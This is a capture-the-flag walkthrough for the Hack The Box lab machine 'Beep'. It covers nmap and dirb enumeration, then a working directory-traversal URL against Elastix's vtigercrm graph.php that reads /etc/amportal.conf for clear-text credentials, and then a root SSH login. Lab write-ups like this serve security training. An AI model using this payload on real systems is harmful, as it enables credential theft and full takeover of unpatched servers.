created by ch4p // 10.10.10.7
// Enumeration //
Beep is the first machine we’ve encountered that is just going to throw a whole lot of spaghetti at you and force you to dig through it. Go ahead and kick off an nmap scan, and watch those ports add up. At the same time, get dirb running against the web server, and browse to the primary web page.
nmap -Pn -A -p- -v 10.10.10.7 -oG /home/rp/Desktop/Beep/nmap
dirb http://10.10.10.7 -f
We get a whole mess of ports thrown at us, with several vulnerabilities amongst them. However, I think the intended path is via the Elastix page, and a quick Google search turns up a well-documented vulnerability. It abuses a misconfiguration that allows unauthenticated directory traversal. To exploit it, simply append the following path to the target IP.
// Exploitation //
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
And in return, we get a whole bunch of information, including what appear to be clear-text usernames and passwords. Let’s give them a go in an SSH session. The server is running a legacy key exchange, so if you get an error with your standard SSH client, try the syntax below:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7
And just like that, we’re in as root, and we have our flags. A very simple machine, but a good look at how directory traversal can be exploited if input is not properly validated and sanitized.